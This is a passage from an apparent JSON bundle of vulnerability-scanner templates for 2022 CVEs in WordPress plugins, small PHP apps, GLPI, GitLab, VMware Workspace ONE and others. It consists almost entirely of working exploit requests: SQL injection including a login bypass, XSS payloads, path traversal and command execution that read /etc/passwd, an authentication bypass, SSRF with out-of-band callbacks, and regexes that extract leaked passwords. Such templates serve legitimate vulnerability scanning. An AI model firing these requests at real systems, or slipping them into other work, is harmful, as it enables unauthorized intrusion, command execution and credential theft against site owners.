application/x-www-form-urlencoded\n\naction=system&function=exec&cmd=cat+/etc/passwd\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","regex":["postgres:.*:1001:","root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-0773","info":{"name":"Documentor <= 1.5.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)\n","GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(content_type_1, \"text/html\")","contains(body_1, \"([])\") && contains(body_2, \".documentor-help\")"],"condition":"and"}]}]},{"id":"CVE-2022-3908","info":{"name":"WordPress Helloprint <1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=language-translate.php&success=added\"><script>alert(`XSS`)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Translation added\\\\\\\"><script>alert(`XSS`)</script> successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-31984","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42749","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-4897","info":{"name":"WordPress BackupBuddy <8.8.3 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"onload=alert(document.domain)\")","contains(body_2, \"BackupBudddy iFrame\")"],"condition":"and"}]}]},{"id":"CVE-2022-26148","info":{"name":"Grafana & Zabbix Integration - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redirect=%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zabbix\":","\"zbx\":","alexanderzobnin-zabbix-datasource"],"condition":"or"},{"type":"regex","part":"body","regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\"","\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php"]}]}]},{"id":"CVE-2022-0735","info":{"name":"GitLab CE/EE - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe","a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-31981","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Control Teams\")"],"condition":"and"}]}]},{"id":"CVE-2022-25323","info":{"name":"ZEROF Web Server 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["back<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2022-1398","info":{"name":"External Media without Import <=1.1.2 - Authenticated Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/upload.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_2","words":["external-media-without-import"]}]}]},{"id":"CVE-2022-24266","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\norder_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"list_admin_table\")"],"condition":"and"}]}]},{"id":"CVE-2022-22972","info":{"name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /vcac/ HTTP/1.1\nHost: {{Hostname}}\n","GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\nHost: {{Hostname}}\n","POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\nHost: {{interactsh-url}}\nContent-type: application/x-www-form-urlencoded\n\nprotected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["HZN="]},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"protected_state","group":1,"regex":["id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"horizonRelayState","group":1,"regex":["name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstore","group":1,"regex":["id=\"userstore\" value=\"([a-z.]+)\" \\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstoreDisplay","group":1,"regex":["id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"regex","name":"stickyConnectorId","group":1,"regex":["name=\"stickyConnectorId\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"kval","name":"HZN-Cookie","kval":["HZN"],"part":"header"}]}]},{"id":"CVE-2022-0201","info":{"name":"WordPress Permalink Manager <2.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(/XSS/)>","pm_query"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-1768","info":{"name":"WordPress RSVPMaker <=9.3.2 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrsvp_id=(select(0)from(select(sleep(5)))a)&amount=1234&email=randomtext\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["\"payment_confirmation_message\":"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4057","info":{"name":"Autoptimize < 3.1.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html","{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Job id &lt;","log messages"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43164","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1391","info":{"name":"WordPress Cab fare calculator < 1.0.4 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1168","info":{"name":"WordPress WP JobSearch <1.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(domain)>","wp-jobsearch"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-27927","info":{"name":"Microfinance Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48165","info":{"name":"Wavlink - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password=","Login="],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password=([^\\s]+)"]}]}]},{"id":"CVE-2022-35914","info":{"name":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&hhook=exec&text={{cmd}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26960","info":{"name":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25489","info":{"name":"Atom CMS v2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Path Array","console-debug"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43170","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-4320","info":{"name":"WordPress Events Calendar <1.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\"><script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["imgNavLeftXX\\\"><script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>({});","><script>alert(document.cookie)</script>.js"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46071","info":{"name":"Helmet Store Showroom v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername='+OR+1%3D1+--+-&password=1234\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")"],"condition":"and"}]}]},{"id":"CVE-2022-2546","info":{"name":"WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"secretkey","group":1,"regex":["ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-32770","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["text: \"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44952","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\nTest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\ntest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\nenglish.php\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\nAmerica/New_York\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n10\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\nm/d/Y\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\nm/d/Y H:i\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n2/./*\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n","@timeout: 5s\nGET /index.php?module=dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"<script>alert(document.domain)</script>\")","contains(body_4, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-37299","info":{"name":"Shirne CMS 1.2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cm9vd"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32015","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-35493","info":{"name":"eShop 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["Search Result for \\\"><img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31978","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_inquiry HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-33174","info":{"name":"Powertek Firmware <3.30.30 - Authorization Bypass","severity":"high"},"requests":[{"raw":["GET 